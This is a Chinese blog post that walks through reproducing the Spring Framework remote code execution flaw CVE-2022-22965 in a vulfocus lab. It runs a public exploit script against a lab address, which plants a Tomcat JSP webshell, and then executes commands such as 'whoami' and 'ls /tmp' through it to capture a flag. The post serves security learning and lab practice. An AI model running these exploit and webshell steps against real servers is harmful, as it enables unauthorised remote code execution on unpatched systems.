Spring Framework远程代码执行漏洞_CVE-2022-22965复现

已于 2024-05-13 15:18:37 修改
阅读量3.6k 收藏 2
点赞数
文章标签: web安全
于 2022-04-07 13:38:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beichenyyds/article/details/124014233
版权

1. 漏洞介绍

Spring Framework是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为 J2EE 应用程序开发提供了一个好用的框架。当Spring部署在JDK9及以上版本,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。

2、受影响版本

  • Spring Core <= 5.2.19, <= 5.3.17
  • Spring Boot <= 2.6.5

3、利用前提

  • JDK 9 及以上版本
  • Spring框架的5.3.0至5.3.17、5.2.0至5.2.19版本,以及旧版本
  • Tomcat服务器

4.漏洞复现

1.打开vulfocus靶场环境,输入访问地址进入之后为以下 ok

2,接下来下载github上的开源exp文件

https://github.com/craig/SpringCore0day

3.下载好之后在下载好的文件内打开终端 输入以上访问地址来检测

python3 exp.py --url http://123.58.236.76:43269/

4.检测发现漏洞存在并附上url地址访问

漏洞存在,shell地址为:http://123.58.236.76:43269/tomcatwar.jsp?pwd=j&cmd=whoami

5.访问已经是root权限,flag在tmp文件下

6.直接输入文件下tmp位置即可得到flag

http://123.58.236.76:43269/tomcatwar.jsp?pwd=j&cmd=ls%20/tmp

即可通关

beichenyyds
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Spring Framework远程代码执行漏洞(CVE-2022-22965)
chaojixiaojingang
04-06 1万+
1.漏洞描述 由于Spring处理流程存在缺陷,在JDK9及以上版本的Spring框架环境中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并注入恶意字段值,触发pipeline机制,从而在任意路径下写入文件。远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。 2.影响版本 JDK >= 9 & 5.3.X < Spring Framework < 5.3.18 JDK >= 9 & 5.2.X ...
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
SpringBoot项目中 Spring Framework远程代码执行漏洞的处理方案
最新发布
傲泣龙腾的博客
04-08 2764
公司最近要求对所有项目进行漏洞检测修复,其中有一项漏洞名称为Spring Framework远程代码执行漏洞CVE-2022-22965)需要升级Spring Framework版本解决,如图高危修复建议将Spring Framework升级至安全版本 ,即升级5.2.20及以上版本 或 5.3.18及以上版本,具体官方修复的5.2和5.3版本可以查找。
Spring Framework远程代码执行漏洞
m0_71745903的博客
01-11 663
2022年3月30日,国家信息安全漏洞共享平台(CNVD)发布了Spring框架远程命令执行漏洞(攻击者利用该漏洞,可在未授权的情况下远程执行命令。目前,此漏洞POC、技术细节及EXP已大范围公开,此漏洞影响范围极大。目前Spring官方已发布补丁修复该漏洞,强烈建议Spring框架用户立即更新至最新版本。
解决:npm WARN deprecated core-js 2.6.11
sinat_34952167的博客
05-20 2349
搭建hey-cli基础的Vue环境 ,安装的时候报错了 然后就根据要求装高版本呗 然后再安装 不出所料,果然还报同样的错 解决方案: 这个npm不行,得用cnpm, 具体可以参照这个链接安装https://blog.csdn.net/wjnf012/article/details/80422313 下面展示一些 内联代码片。 npm install -g cnpm --registry=https://registry.npm.taobao.org 然后 要用cnpm $ cnpm install -g
Spring Framework远程代码执行漏洞CVE-2022-22965
qq_50854662的博客
06-27 775
Spring Framework远程代码执行漏洞CVE-2022-22965
(CVE-2022-22965)Spring Framework 远程命令执行漏洞(vulfocus复现)
qq_40646572的博客
05-11 824
漏洞SpringFramework数据绑定的一个漏洞,如果后台方法中接受的参数为非基础类型,Spring会根据前端传入的请求正文中的参数的key值来查询与其名称所对应的getter和setter方法,攻击者利用这一特性修改了Tomcat的一个用于日志记录的类的属性,进而当Tomcat在进行写日志操作的时候,将攻击者传递的恶意代码写入指定目录的指定文件中。
漏洞复现CVE-2022-22965 Spring Framework远程代码执行漏洞
m0_53121608的博客
07-16 192
服务启动后,访问http://your-ip:8080/?name=Steve&age=25即可看到一个演示页面。
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Java 6 将 log4j 升级到 2.3.2 版本,Java 7 将 log4j 升级到 2.12.4 版本,Java 8 或更高版本将 log4j 升级到 2.17.1 版本
网站漏洞 网站漏洞 网站漏洞 网站漏洞
10-21
网站漏洞网站漏洞网站漏洞网站漏洞网站漏洞网站漏洞
Spring Framework 远程命令执行漏洞CVE-2022-22965
qq_32445755的博客
03-31 335
简介 Spring coreSpring系列产品中用来负责发现、创建并处理bean之间的关系的一个工具包,是一个包含Spring框架基本的核心工具包,Spring其他组件都要使用到这个包。 未经身份验证的攻击者可以使用此漏洞进行远程任意代码执行。 该漏洞广泛存在于Spring 框架以及衍生的框架中,并JDK 9.0及以上版本会受到影响。 Spring 0day漏洞 影响范围 JDK9 <= Spring Cloud Function JDK9及其以上版本; 使⽤了Spring-bean
Spring框架(Framework)存在远程命令执行漏洞
qq_20025777的博客
08-31 542
Spring框架存在远程命令执行漏洞
spring framework远程代码执行漏洞复现(CNVD-2022-23942 CVE-2022-22965
yang1234567898的博客
04-18 6977
3 月 30 日,国家信息安全漏洞共享平台(CNVD)接收到蚂蚁科技集团股份有限公司报送的 Spring 框架远程命令执行漏洞(CNVD-2022-23942)。攻击者利用该漏洞,可在未授权的情况下远程执行命令。CNVD 对该漏洞的综合评级为“高危”。 漏洞影响: JDK9+ 使用了 Spring 框架或衍生框架 Apache Tomcat 作为 Servlet 容器 spring-webmvc 或 spring-webflux 依赖 Spring Framework 版本 5.3.0..
【干货】Spring远程命令执行漏洞CVE-2022-22965)原理分析和思考
2201_75735270的博客
07-25 516
上周网上爆出Spring框架存在RCE漏洞,野外流传了一小段时间后,Spring官方在3月31日正式发布了漏洞信息,漏洞编号为CVE-2022-22965。本文章对该漏洞进行了复现和分析,希望能够帮助到有相关有需要的人员进一步研究。
CVE-2022-22965Spring Framework远程代码执行漏洞
qq_50854662的博客
11-12 1523
CVE-2022-22965Spring Framework远程代码执行漏洞
JS中常见的安全漏洞
weixin_70191743的博客
11-28 2126
JS中常见的安全漏洞
PHP 远程代码执行漏洞(CVE-2022-31625)修复办法
07-14
针对PHP远程代码执行漏洞(CVE-2022-31625),以下是一些修复方法: 1. 更新到最新版本:确保你的PHP版本是最新的,因为漏洞修复通常会包含在更新中。请访问PHP官方网站或者使用包管理工具来获取最新版本。 2. 禁用危险函数:在php.ini配置文件中,禁用危险函数可以帮助防止远程代码执行。可以使用disable_functions指令来禁用一些敏感函数,如eval()、exec()、system()等。 3. 安全配置:检查你的PHP配置文件,确保安全设置已经启用。例如,禁用动态加载扩展、限制文件上传目录和大小、禁用远程文件包含等。 4. 输入验证和过滤:在你的应用程序中对用户输入进行严格的验证和过滤,以防止恶意代码注入。 5. 使用安全框架或库:使用安全框架或库来帮助防止远程代码执行漏洞。这些框架通常提供安全的默认配置和内置的安全功能。 6. 定期更新和监控:定期检查并更新你的应用程序和相关组件,以确保及时修复已知漏洞。同时,监控应用程序的日志和网络流量,以便及时发现异常行为。 请注意,这些方法只是一些常用的修复措施,具体的修复方法可能会因系统配置和应用程序的特定情况而有所不同。建议在修复漏洞之前,先进行充分的测试和备份。此外,如果你不确定如何处理或无法解决该漏洞,请咨询安全专家或PHP开发人员的帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值